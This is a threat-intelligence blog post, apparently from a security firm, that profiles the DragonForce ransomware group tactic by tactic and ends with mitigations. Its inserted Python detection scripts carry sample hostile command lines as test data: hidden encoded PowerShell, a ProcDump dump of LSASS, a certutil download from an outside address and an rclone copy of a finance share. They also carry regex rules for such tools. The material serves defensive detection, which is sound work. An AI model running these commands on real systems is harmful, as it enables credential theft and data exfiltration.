What started as a pro-Palestine hacktivist group has evolved into DragonForce, a profit-driven ransomware operation now shaping the RaaS ecosystem in 2025. Although DragonForce only surfaced in late 2023, it quickly established itself in the Ransomware-as-a-Service (RaaS) market.
Unlike a traditional single-group gang, DragonForce operates more like a cartel, recruiting affiliate hackers and even other RaaS operators to use its ransomware platform under a white-label model. Affiliates are free to brand attacks as their own while leveraging DragonForce's infrastructure for malware deployment, leak-site hosting, and ransom negotiations. In return, the group takes a 20% share of the profits, allowing it to scale rapidly without carrying out all the attacks itself.
The history behind DragonForce
DragonForce emerged in 2023, initially experimenting with ransomware activity before rapidly evolving into a fully structured Ransomware-as-a-Service operation. DragonForce has also used underground forums like RAMP to advertise its operations, openly calling for affiliates and collaborators in an effort to grow its network and strengthen its position in the ransomware ecosystem. Built on leaked source code from strains like LockBit 3.0 and Conti, its encryptor provided a solid foundation that has since been adapted into variants capable of targeting Windows, Linux, VMware ESXi, BSD and NAS platforms.
Motivated by profit rather than ideology, DragonForce has nonetheless openly claimed to follow a moral code, such as avoiding certain healthcare targets and expressing empathy for critical patients, though how consistently this is adhered to remains uncertain. Its modus operandi combines data theft with encryption in a double-extortion model, giving the operators significant leverage in ransom negotiations. From newcomer to sophisticated global ransomware threat, DragonForce has quickly scaled into an enterprise-style operation with growing technical maturity.
Affected Countries: United States, Australia, India, New Zealand, Singapore, Canada, United Kingdom, Ireland, France, Spain, Italy, Belgium, Sweden, Switzerland, Czechia, United Arab Emirates, Malaysia, Palau, China, Argentina, Colombia, Curacao, South Africa.
Affected Industries: Gaming, Logistics, Healthcare, Manufacturing, Government, Real Estate, Transportation, Food & Beverage, Education, Finance, Information Technology, Marketing, Hospitality, Travel, Tourism and Media.
Technical Analysis
Initial Access
DragonForce ransomware operators and affiliates rely on a mix of vulnerability exploitation and human-targeted tactics to gain initial access to victim environments. The group depends heavily on social engineering, including phishing emails, fake SSO portals, SIM swapping, and MFA push "bombing", to harvest credentials, often targeting IT help desks to bypass authentication barriers.
Once credentials are obtained, DragonForce actors frequently abuse valid accounts, blending in with legitimate user activity to avoid detection. This combination of vulnerability exploitation, credential theft, and misuse of legitimate accounts allows DragonForce to establish a stealthy and resilient foothold before deploying post-exploitation tools such as Cobalt Strike, Mimikatz, and SystemBC.
Vulnerabilities abused by DragonForce operators to gain initial access
Execution
DragonForce ransomware operators employ multiple techniques to execute their payloads on compromised systems. One common approach is the use of Windows Command Shell commands or DLL hijacking to run malicious components. The group also heavily abuses PowerShell, leveraging its trusted and pre-installed nature to execute scripts, disable security features, and deliver additional payloads. In some instances, DragonForce has used hidden PowerShell commands referenced in registry Run keys to ensure malware executes silently at startup. By loading code directly into memory rather than writing it to disk, they evade antivirus products that rely on file scanning.
Execution is not always purely technical: social engineering also plays a key role. Victims are tricked into running malicious files delivered via phishing emails, such as documents with hidden macros or executables disguised as PDFs. These files serve as loaders, initiating communication with attacker infrastructure and preparing the ground for ransomware deployment.
Persistence
DragonForce actors employ a variety of persistence techniques to maintain long-term access after initial compromise, leveraging methods such as scheduled tasks, creation or modification of system processes, abuse of valid accounts, and exploitation of external remote services. In several cases they have modified the Windows registry to ensure payloads survive reboots - for example by adding an entry to HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce to execute a SystemBC proxy (e.g., %TMP%\socks aug\socks.exe) at startup - thereby preserving backdoor connectivity across restarts.
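The hidden-PowerShell Run-key entries described under Execution and the RunOnce entry for the SystemBC proxy described above both leave the same trace: a write to an autostart key, which Sysmon records as Event ID 13 (RegistryEvent, value set). The following hunting logic is an added example written for this page, not code from the original article or from any of the cited vendors. The sample events are constructed; the registry paths and image names in them are hypothetical, except that the first entry mirrors the %TMP%\socks RunOnce value quoted in the text. The pattern lists are a starting point to tune against your own baseline.

```python
import re

# Constructed Sysmon Event ID 13 (RegistryEvent: value set) records. Field names follow
# Sysmon's schema; the values are made up for this example, except that the first entry
# mirrors the RunOnce -> %TMP%\socks SystemBC entry described in the text.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\socks",
     "Details": r"%TMP%\socks aug\socks.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"powershell.exe -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r"C:\Program Files\Vendor\agent.exe /background"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

# Run / RunOnce / RunServices / RunServicesOnce keys under HKLM or HKCU.
AUTORUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once|Services|ServicesOnce)?\\", re.I)
# Locations a legitimate installer almost never points an autostart entry at.
TEMP_PATH = re.compile(r"(%TMP%|%TEMP%|\\Temp\\|\\Users\\Public\\)", re.I)
# PowerShell launched with a hidden window or an encoded command (short and long switch forms).
HIDDEN_PS = re.compile(
    r"powershell(\.exe)?.*(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})", re.I)
# Scripting and admin utilities that plant entries by hand; installers and MSIs do not show up here.
SUSPICIOUS_WRITERS = {"reg.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                      "wscript.exe", "cscript.exe", "rundll32.exe", "mshta.exe"}


def assess(event):
    """Return the reasons an autostart write looks malicious; [] means benign or not an autostart key."""
    if event.get("EventID") != 13 or not AUTORUN_KEY.search(event.get("TargetObject", "")):
        return []
    data = event.get("Details", "")
    writer = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    reasons = []
    if TEMP_PATH.search(data):
        reasons.append("autostart target lives in a temp or world-writable directory")
    if HIDDEN_PS.search(data):
        reasons.append("hidden or encoded PowerShell command")
    if writer in SUSPICIOUS_WRITERS:
        reasons.append(f"entry written by {writer} rather than an installer")
    return reasons


def hunt(events):
    """Map each flagged registry value to the reasons it was flagged."""
    return {e["TargetObject"]: r for e in events if (r := assess(e))}


if __name__ == "__main__":
    for key, reasons in hunt(SAMPLE_EVENTS).items():
        print(key, "->", "; ".join(reasons))
```

The OneDrive entry is kept deliberately: it runs from AppData, which is why the path check is restricted to temp and public directories rather than everything under a user profile. Widen TEMP_PATH only after checking how many legitimate per-user autostarts your estate has.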
Privilege Escalation
For privilege escalation, DragonForce frequently combines native persistence mechanisms with credential abuse to amplify access: they employ boot/autostart techniques and registry or scheduled-task modifications to ensure payloads persist across reboots, while relying on stolen or newly created legitimate accounts to retain and elevate privileges. Those credentials are then reused to move laterally via built-in services such as RDP, SMB and administrative shares, enabling them to pivot to higher-value systems; in many intrusions, adversaries also deploy post-exploitation tooling such as Cobalt Strike and PsExec to escalate privileges, execute commands remotely, and stage further compromise. Organizations should therefore treat autostart changes, anomalous account activity, and unauthorized use of remote administration tools as high-risk indicators of privilege escalation.
Defense Evasion
DragonForce actors deploy a range of defense-evasion techniques to conceal activity and frustrate analysis. Their ransomware can delete intrusion artifacts and tamper with file metadata (timestomping) to obscure timelines, while discovery routines check for sandbox or debugger environments and abort execution in those contexts. They frequently disable or alter security controls: killing processes, changing registry settings, and disrupting update or cloud-monitoring agents to reduce detection and response.
In more aggressive campaigns, affiliates have used Bring Your Own Vulnerable Driver (BYOVD) tactics, loading legitimate but vulnerable signed kernel drivers and abusing them to subvert endpoint protections. Because such drivers carry valid signatures, signature checks alone do not catch them; organizations should monitor for unexpected file-deletion events, anomalous timestamp changes, sudden service or process terminations, and the loading of uncommon, unsigned, or known-vulnerable drivers as high-priority indicators of defense evasion.
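Two of the evasion behaviours above, driver loading and timestomping, are directly observable in Sysmon: Event ID 6 (DriverLoad) carries the driver's path, signature status and hashes, and Event ID 2 (FileCreateTime changed) carries both the old and the new creation time. The check below is an added example written for this page, not code from the original article or from any cited vendor. The events are constructed, the blocklist holds one placeholder hash (in practice populate it from Microsoft's vulnerable driver blocklist or the LOLDrivers project), and the 30-day threshold and the list of timestamp-preserving processes are assumptions to tune locally.

```python
from datetime import datetime, timedelta

# Hypothetical blocklist with a single placeholder hash. BYOVD drivers carry VALID signatures, so a
# signature check alone never catches them; a hash blocklist (or WDAC policy) is what does.
VULNERABLE_DRIVER_SHA256 = {"00" * 32}
USER_WRITABLE = ("\\temp\\", "\\users\\", "\\programdata\\")
# How far back a creation time must jump before we call it timestomping rather than clock skew.
TIMESTOMP_THRESHOLD = timedelta(days=30)
# Processes that legitimately preserve or rewrite file times when copying or installing (assumed list).
TIMESTAMP_PRESERVING = ("\\explorer.exe", "\\msiexec.exe", "\\robocopy.exe", "\\tiworker.exe")

# Constructed Sysmon events: EventID 6 = DriverLoad, EventID 2 = FileCreateTime changed.
SAMPLE_EVENTS = [
    {"EventID": 6, "ImageLoaded": r"C:\Windows\Temp\drv.sys", "Signed": "true",
     "SignatureStatus": "Valid", "Hashes": "SHA256=" + "00" * 32 + ",MD5=" + "11" * 16},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys", "Signed": "true",
     "SignatureStatus": "Valid", "Hashes": "SHA256=" + "22" * 32 + ",MD5=" + "33" * 16},
    {"EventID": 6, "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\x.sys", "Signed": "false",
     "SignatureStatus": "Unsigned", "Hashes": "SHA256=" + "44" * 32},
    {"EventID": 2, "Image": r"C:\Users\alice\AppData\Local\Temp\sb.exe",
     "TargetFilename": r"C:\Windows\Temp\sb.exe",
     "CreationUtcTime": "2019-03-03 08:00:00", "PreviousCreationUtcTime": "2025-05-01 09:31:11"},
    {"EventID": 2, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\Documents\report.docx",
     "CreationUtcTime": "2024-01-10 10:00:00", "PreviousCreationUtcTime": "2025-05-01 10:00:00"},
]


def _sha256(hashes_field):
    """Sysmon writes hashes as 'SHA256=...,MD5=...'; pick out the SHA-256."""
    parts = dict(kv.split("=", 1) for kv in hashes_field.split(",") if "=" in kv)
    return parts.get("SHA256", "").lower()


def _t(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def assess(event):
    """Return a reason string for a driver-load or timestomp indicator, else None."""
    eid = event.get("EventID")
    if eid == 6:
        image = event.get("ImageLoaded", "")
        if _sha256(event.get("Hashes", "")) in VULNERABLE_DRIVER_SHA256:
            return f"known vulnerable driver loaded: {image}"
        if event.get("Signed", "").lower() != "true" or event.get("SignatureStatus") != "Valid":
            return f"unsigned or invalidly signed driver loaded: {image}"
        if any(p in image.lower() for p in USER_WRITABLE):
            return f"signed driver loaded from a user-writable path: {image}"
    if eid == 2:
        moved_back = _t(event["PreviousCreationUtcTime"]) - _t(event["CreationUtcTime"])
        if moved_back > TIMESTOMP_THRESHOLD and not event.get("Image", "").lower().endswith(TIMESTAMP_PRESERVING):
            return f"creation time of {event['TargetFilename']} moved back {moved_back.days} days by {event['Image']}"
    return None


def hunt(events):
    return [r for e in events if (r := assess(e))]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Note the order of the driver checks: the validly signed driver in C:\Windows\Temp is caught by its hash first, which is the only check that would fire on a real BYOVD payload dropped into a system directory.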
Credential Access
DragonForce operators rapidly harvest credentials, commonly extracting secrets from Windows memory, notably the LSASS process, using tools such as Mimikatz, or by dumping process memory with utilities like ProcDump and analyzing it offline. They have also targeted Active Directory data stores to reconstruct credential material and have been observed collecting local administrator passwords and full credential sets that enable immediate domain-wide control. These techniques yield valid authentication tokens, hashes, and Kerberos tickets that facilitate swift privilege escalation and lateral movement.
In a few documented incidents, harvested credentials were even written to plaintext files (e.g., “123.txt”), illustrating how quickly attackers can accumulate the account access needed to administer systems and ultimately deploy ransomware at scale.
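Whether the dump is taken with Mimikatz or with ProcDump, the common denominator is a handle to lsass.exe with memory-read rights, which Sysmon logs as Event ID 10 (ProcessAccess) together with the granted access mask. The detection below is an added example written for this page, not code from the original article or from any cited vendor. The events are constructed, the allowlist of legitimate LSASS readers is a hypothetical placeholder to fill from your own estate, and the access-mask constants are the standard Windows process rights.

```python
import re

# Bits of the Windows process access mask that a memory read or dump needs.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ       = 0x0010
PROCESS_VM_WRITE      = 0x0020
PROCESS_DUP_HANDLE    = 0x0040
DUMP_CAPABLE = PROCESS_CREATE_THREAD | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE

# Hypothetical allowlist: the security agents in your own estate that legitimately open LSASS.
ALLOWED_LSASS_READERS = {r"c:\program files\windows defender\msmpeng.exe"}

# Command lines that dump LSASS with a signed Sysinternals tool or a built-in DLL.
DUMP_CMDLINE = re.compile(
    r"(procdump(64)?(\.exe)?\b.*-ma\s+lsass|comsvcs(\.dll)?\b.*minidump|rundll32.*minidump)", re.I)

# Constructed events in Sysmon's field naming (EventID 10 = ProcessAccess, EventID 1 = ProcessCreate).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Tools\procdump64.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\alice\AppData\Local\Temp\mm.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"EventID": 1, "Image": r"C:\Tools\procdump.exe",
     "CommandLine": r"procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp"},
]


def assess(event):
    """Return a reason if the event shows LSASS memory being read or dumped, else None."""
    eid = event.get("EventID")
    if eid == 10 and event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        mask = int(event.get("GrantedAccess", "0x0"), 16)
        src = event.get("SourceImage", "").lower()
        # 0x1000 / 0x1400 style masks only query process information; anything that can read or
        # write LSASS memory, or duplicate its handles, can harvest credentials.
        if mask & DUMP_CAPABLE and src not in ALLOWED_LSASS_READERS:
            return f"{src} opened lsass.exe with access mask {mask:#x}"
    if eid == 1 and DUMP_CMDLINE.search(event.get("CommandLine", "")):
        return f"LSASS dump via command line: {event['CommandLine']}"
    return None


def hunt(events):
    return [r for e in events if (r := assess(e))]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The renamed mm.exe with mask 0x1010 (query information plus VM_READ) is the Mimikatz-style case; a rule that only looked for PROCESS_ALL_ACCESS (0x1FFFFF) would miss it, which is why the check is on the read/write/duplicate bits rather than on one exact value.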
Discovery
DragonForce operators conduct thorough reconnaissance to map target environments and identify high-value systems prior to ransomware deployment. They enumerate network configurations and system details using commands and queries such as ipconfig/ifconfig, systeminfo, and WMI to collect IP addresses, routes, OS versions, hostnames and logged-on users, and to profile reachable systems. Active Directory is heavily queried: tools such as AdFind are used to harvest information on domain trusts, organizational units, user and group memberships, and other directory metadata, revealing the domain's structure and potential paths to critical assets such as domain controllers and file servers. This intelligence-driven approach allows the group to locate privileged accounts, map trust relationships across domains, and plan lateral movement and the timing of disruptive actions.
Lateral Movement
DragonForce actors routinely exploit legitimate administrative tools and native Windows services to move laterally and extend their reach. In recent campaigns they abused the SimpleHelp remote management platform, an enterprise-sanctioned RMM tool, to gain remote control of endpoints and propagate quietly across managed service provider networks. Their primary lateral technique remains interactive RDP sessions, using harvested credentials to hop from compromised workstations to file servers and domain controllers and, when needed, enabling RDP or adding accounts to the "Remote Desktop Users" group to create new access paths.
They also rely on SMB and administrative shares (for example \\HOST\C$) to drop and run payloads remotely. These living-off-the-land approaches let the operators blend with normal administrative activity while manually deploying tools and ransomware across the environment.
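The three lateral-movement behaviours above (RDP hops to servers, additions to the "Remote Desktop Users" group, and use of C$ / ADMIN$ shares) all show up in the standard Windows Security log as events 4624, 4732 and 5140. The correlation below is an added example written for this page, not code from the original article or from any cited vendor. The events are constructed, and the server list, jump-host subnet and host names are hypothetical placeholders for your own asset inventory.

```python
import ipaddress
from collections import defaultdict

# Hypothetical environment facts; replace with your own asset inventory.
TIERED_SERVERS = {"DC01", "FS01"}                      # hosts that should only see RDP from the jump subnet
JUMP_HOST_NET = ipaddress.ip_network("10.10.5.0/24")   # sanctioned admin/jump-host subnet
RDP_USERS_SID = "S-1-5-32-555"                         # well-known SID of BUILTIN\Remote Desktop Users
ADMIN_SHARES = {"C$", "ADMIN$"}                        # IPC$ is left out: every SMB session opens it

# Constructed Windows Security events (4624 logon, 4732 member added to local group, 5140 share accessed).
SAMPLE_EVENTS = [
    {"EventID": 4624, "Computer": "DC01.corp.example", "LogonType": 10,
     "TargetUserName": "svc_backup", "IpAddress": "10.10.20.55", "WorkstationName": "WS-ALICE"},
    {"EventID": 4624, "Computer": "WS-ALICE.corp.example", "LogonType": 2,
     "TargetUserName": "alice", "IpAddress": "-", "WorkstationName": "WS-ALICE"},
    {"EventID": 4732, "Computer": "FS01.corp.example", "TargetSid": "S-1-5-32-555",
     "TargetUserName": "Remote Desktop Users", "MemberName": "CORP\\helpdesk2", "SubjectUserName": "svc_backup"},
    {"EventID": 5140, "Computer": "FS01.corp.example", "ShareName": "\\\\*\\C$",
     "SubjectUserName": "svc_backup", "IpAddress": "10.10.20.55"},
    {"EventID": 5140, "Computer": "FS01.corp.example", "ShareName": "\\\\*\\Finance",
     "SubjectUserName": "alice", "IpAddress": "10.10.20.12"},
    {"EventID": 4624, "Computer": "FS01.corp.example", "LogonType": 10,
     "TargetUserName": "jumpadmin", "IpAddress": "10.10.5.2", "WorkstationName": "JUMP01"},
]


def assess(event):
    """Return (account, description) for a lateral-movement indicator, or None."""
    eid = event.get("EventID")
    host = event.get("Computer", "").split(".")[0].upper()
    if eid == 4624 and event.get("LogonType") == 10 and host in TIERED_SERVERS:
        # Logon type 10 is RemoteInteractive, i.e. an RDP session.
        src = event.get("IpAddress", "-")
        try:
            from_jump = ipaddress.ip_address(src) in JUMP_HOST_NET
        except ValueError:          # "-" for local logons
            from_jump = False
        if not from_jump:
            return (event["TargetUserName"], f"RDP logon to {host} from non-jump-host address {src}")
    if eid == 4732 and event.get("TargetSid") == RDP_USERS_SID:
        return (event["SubjectUserName"], f"{event['MemberName']} added to Remote Desktop Users on {host}")
    if eid == 5140:
        share = event.get("ShareName", "").rsplit("\\", 1)[-1].upper()
        if share in ADMIN_SHARES:
            return (event["SubjectUserName"], f"admin share {share} on {host} opened from {event.get('IpAddress')}")
    return None


def hunt(events):
    """Group indicators by account: one account producing several of them across hosts is the signal."""
    by_account = defaultdict(list)
    for e in events:
        if (hit := assess(e)):
            by_account[hit[0]].append(hit[1])
    return dict(by_account)


if __name__ == "__main__":
    for account, findings in hunt(SAMPLE_EVENTS).items():
        print(account)
        for f in findings:
            print("  -", f)
```

Each indicator on its own is ordinary administration; grouping by account is what turns them into a finding, here a single service account that RDPs into a domain controller from a workstation, grants itself more RDP access and then opens C$ on the file server.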
Collection
As part of their collection activities, DragonForce harvests sensitive artifacts, including user credentials, system configurations, and network topology details, and consolidates this information into log or dump files, preserving it for subsequent misuse such as credential replay or targeted extortion.
Command and Control
DragonForce operators maintain and obscure remote control of compromised systems using a mix of tunnelling and covert C2 techniques. They frequently stage tools via Ingress Tool Transfer, commonly over protocols such as FTP or by abusing built-in utilities such as certutil.exe and PowerShell to move implants into the victim environment. Once resident, backdoors or agents (notably Cobalt Strike Beacon) establish command-and-control channels that typically operate over HTTP/HTTPS, allowing traffic to blend with routine web or API calls and evade simple network filtering.
Proxy implants such as SystemBC add stealth by creating SOCKS5 tunnels that mask outbound connections, so even if one channel is discovered other conduits remain available. By layering multiple delivery and C2 mechanisms, the group preserves real-time control, enables remote execution and data exfiltration, and makes full containment harder.
Exfiltration
Before proceeding to encryption, DragonForce routinely conducts large-scale data theft, using both its C2 channels and dedicated file-transfer tools to move bulk data out of victim networks. Attackers often compress sensitive files into archives and exfiltrate them via SFTP, WebDAV, cloud storage services, anonymous FTP or by using command-line utilities such as rclone or wget to push data to attacker-controlled endpoints. In many intrusions the haul measures in gigabytes or terabytes; when victims refuse to pay, stolen material is posted to a public leak site as part of a double-extortion strategy.
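The Discovery, Command and Control, and Exfiltration sections above each name command-line tools (AdFind and systeminfo; certutil.exe and PowerShell downloads; rclone, wget and similar) that a process-creation log records verbatim. The rule set and per-account correlation below is an added example written for this page, not code from the original article or from any cited vendor; it serves all three sections at once because the interesting signal is one account chaining the stages. The events are constructed in Sysmon Event ID 1 field naming, the account and host names are hypothetical, and the rules are deliberately narrow (ipconfig or net on their own are far too common to alert on).

```python
import re
from collections import defaultdict

# Rule table: (tactic, name, pattern). Only tools and switches that carry intent are listed.
RULES = [
    ("discovery", "adfind", re.compile(r"\badfind(\.exe)?\b", re.I)),
    ("discovery", "systeminfo", re.compile(r"\bsysteminfo\b", re.I)),
    ("discovery", "nltest-trusts", re.compile(r"\bnltest(\.exe)?\b.*/(dclist|domain_trusts)", re.I)),
    ("ingress", "certutil-download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache.*(\s-f\b|https?://)", re.I)),
    ("ingress", "bitsadmin-transfer", re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I)),
    ("ingress", "powershell-download",
     re.compile(r"powershell.*(Invoke-WebRequest|DownloadFile|DownloadString|\biwr\b)", re.I)),
    ("exfiltration", "rclone", re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I)),
    ("exfiltration", "curl-wget-upload",
     re.compile(r"\b(curl|wget)(\.exe)?\b.*(--upload-file|\s-T\s|--post-file|--body-file)", re.I)),
]

# Constructed process-creation events (Sysmon Event ID 1 fields); the 203.0.113.0/24 address is a
# documentation range, not a real host.
SAMPLE_EVENTS = [
    {"UtcTime": "2025-05-01 09:14:02", "User": "CORP\\svc_backup",
     "CommandLine": "adfind.exe -f (objectcategory=group) -csv"},
    {"UtcTime": "2025-05-01 09:15:40", "User": "CORP\\svc_backup",
     "CommandLine": "cmd.exe /c systeminfo && ipconfig /all"},
    {"UtcTime": "2025-05-01 09:31:11", "User": "CORP\\svc_backup",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.10/sb.exe C:\\Windows\\Temp\\sb.exe"},
    {"UtcTime": "2025-05-01 11:02:55", "User": "CORP\\svc_backup",
     "CommandLine": "rclone.exe copy \\\\FS01\\Finance remote:drop --transfers 16"},
    {"UtcTime": "2025-05-01 11:03:01", "User": "CORP\\alice",
     "CommandLine": "certutil.exe -verify C:\\Users\\alice\\Downloads\\cert.cer"},
    {"UtcTime": "2025-05-01 11:10:00", "User": "CORP\\alice",
     "CommandLine": "ipconfig /all"},
]


def classify(cmdline):
    """All (tactic, rule name) pairs that a command line matches."""
    return [(tactic, name) for tactic, name, pat in RULES if pat.search(cmdline)]


def hunt(events):
    """Per account: the set of tactics observed and a time-ordered list of the matching commands."""
    per_user = defaultdict(lambda: {"tactics": set(), "timeline": []})
    for e in sorted(events, key=lambda e: e["UtcTime"]):
        hits = classify(e["CommandLine"])
        if not hits:
            continue
        rec = per_user[e["User"]]
        rec["tactics"].update(t for t, _ in hits)
        rec["timeline"].append((e["UtcTime"], ", ".join(n for _, n in hits), e["CommandLine"]))
    return per_user


def escalate(events, min_tactics=2):
    """Accounts that chained at least min_tactics distinct stages; single hits stay as low-priority context."""
    return {user: rec for user, rec in hunt(events).items() if len(rec["tactics"]) >= min_tactics}


if __name__ == "__main__":
    for user, rec in escalate(SAMPLE_EVENTS).items():
        print(user, sorted(rec["tactics"]))
        for when, rule, cmd in rec["timeline"]:
            print(" ", when, rule, "|", cmd)
```

The certutil -verify and bare ipconfig lines from the second account are included to show the rules not firing: certutil is only interesting with -urlcache, and an account with a single discovery hit never reaches the escalation threshold.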
Impact
DragonForce's primary objective is to render victims' data unusable by deploying its encryptor across the compromised environment. The ransomware uses a hybrid scheme (commonly AES for bulk file encryption, with the AES keys protected by RSA so that files cannot be recovered without the operators' private key) to lock files on Windows, Linux, NAS devices and virtual infrastructure, including VMware ESXi hosts, which lets attackers incapacitate entire virtual servers and escalate impact rapidly.
Once encryption is complete, DragonForce drops a ransom note, usually named README.txt, on the victim's desktop and in each directory containing encrypted files. The result is both immediate operational disruption and a sustained reputational and data-privacy risk for affected organizations.
Ransom Note
DragonForce operates a dedicated leak site on the dark web to amplify pressure on victims: when ransom demands go unpaid, stolen files are published publicly, inflicting reputational damage and increasing regulatory exposure in addition to operational disruption. Although the specifics of their negotiation playbook and exact ransom figures are not broadly disclosed, the dual threat of data theft plus system encryption gives operators and affiliates substantial bargaining power.

MITRE ATT&CK Tactics and Techniques
Mitigation Strategies Against DragonForce Ransomware
- Strengthen Email Security & User Awareness - Deploy advanced filtering to block phishing emails and malicious attachments. Regularly conduct phishing simulations and security awareness training to reduce social engineering risks.
- Timely Patch & Vulnerability Management - Apply security updates without delay, prioritizing critical flaws frequently exploited in ransomware campaigns. Conduct periodic audits to identify and remediate unpatched systems.
- Credential & Authentication Controls - Enforce strong, unique passwords, screen them against breached-password lists, and rotate any credential suspected of exposure. Implement Multi-Factor Authentication (MFA) across all accounts, with strict emphasis on administrative and remote access; given the group's use of MFA push bombing and fake SSO portals, prefer phishing-resistant methods or number matching over simple push approval.
- Remote Access Hardening - Disable RDP where it is not needed; otherwise restrict it behind a VPN or gateway with MFA, enforce IP allow-listing and least-privilege access, and alert on changes to the "Remote Desktop Users" group.
- Network Segmentation & Isolation - Separate critical assets such as domain controllers, backup servers, and sensitive databases using VLANs and firewalls to limit lateral movement opportunities.
- Advanced Endpoint Detection & Monitoring - Deploy Endpoint Detection and Response (EDR) solutions tuned to detect post-exploitation tools like Cobalt Strike and Mimikatz. Incorporate behavior-based monitoring to flag anomalies such as unusual logins, privilege escalations, or excessive RDP activity.
- Application & Driver Control - Enforce application allow-listing to block unauthorized executables in user and temporary directories. Mitigate Bring Your Own Vulnerable Driver (BYOVD) attacks by enabling Microsoft's vulnerable driver blocklist and Windows Defender Application Control (WDAC) policies, with hypervisor-protected code integrity (HVCI) where the hardware supports it.
- Access & Privilege Restrictions - Apply least-privilege principles to minimize admin or SYSTEM-level rights. Closely monitor for token manipulation, impersonation, and suspicious service creations.
- Data Protection & Loss Prevention - Use DLP solutions to detect and restrict unauthorized data transfers via SFTP, WebDAV, or cloud platforms. Implement outbound traffic filtering to block malicious IPs, Tor nodes, and ransomware leak sites.
- Robust Backup & Recovery Readiness - Maintain offline, immutable backups stored separately from the main network. Regularly test restoration processes to ensure business continuity after an attack.
- Log & Registry Monitoring - Forward system and security logs to a centralized SIEM for retention and review. Monitor for sudden log clearing, unusual registry modifications, or unauthorized scheduled task creations.
- Incident Response & Preparedness - Develop and test incident response playbooks covering detection, containment, recovery, and communication during ransomware incidents. Run tabletop exercises simulating DragonForce-style double extortion attacks.
- Threat Intelligence Integration - Continuously track Indicators of Compromise (IoCs), tactics, and affiliate behaviors linked to DragonForce through trusted intelligence feeds to stay ahead of evolving threats.
Sources Cited:
- https://blog.checkpoint.com/security/dragonforce-ransomware-redefining-hybrid-extortion-in-2025/
- https://www.resecurity.com/blog/article/dragonforce-ransomware-reverse-engineering-report
- https://specopssoft.com/blog/dragonforce-ransomware-as-a-service/#dragonforce:-inside-heading
- https://www.bitdefender.com/en-us/blog/businessinsights/dragonforce-ransomware-cartel
- https://cyble.com/threat-actor-profiles/dragonforce-ransomware-group/
- https://www.picussecurity.com/resource/blog/dragonforce-ransomware-attacks-retail-giants
- https://socradar.io/dark-web-profile-dragonforce-ransomware/
- https://www.bridewell.com/insights/blogs/detail/who-are-dragonforce-ransomware-group
- https://blog.barracuda.com/2025/06/09/dragonforce-ransomware-cartel-vs--everybody
- https://www.attackiq.com/2025/05/23/emulating-dragonforce-ransomware/
- https://www.sentinelone.com/blog/dragonforce-ransomware-gang-from-hacktivists-to-high-street-extortionists/
- https://www.group-ib.com/blog/dragonforce-ransomware/
- https://www.watchguard.com/wgrd-security-hub/ransomware-tracker/dragonforce
- https://blackpointcyber.com/wp-content/uploads/2024/11/DragonForce.pdf
- https://www.quorumcyber.com/malware-reports/dragonforce-ransomware-report/
- https://cybelangel.com/who-is-the-dragonforce-ransomware-gang/
- https://www.ransomware.live/group/dragonforce
About Loginsoft
For over 20 years, leading companies in Telecom, Cybersecurity, Healthcare, Banking, New Media, and more have relied on Loginsoft as a trusted resource for technology talent, with clients ranging from startups to product and enterprise companies. Whether Onsite, Offsite, or Offshore, we deliver. With a track record of successful partnerships with leading technology companies globally, and specifically in the past 6 years with Cybersecurity product companies, Loginsoft offers a comprehensive range of security offerings, including Software Supply Chain, Vulnerability Management, Threat Intelligence, Cloud Security, Cybersecurity Platform Integrations, creating content packs for Cloud SIEM, Logs onboarding and more. Our commitment to innovation and expertise has positioned us as a trusted player in the cybersecurity space. Loginsoft continues to provide traditional IT services which include Software development & Support, QA automation, Data Science & AI, etc.
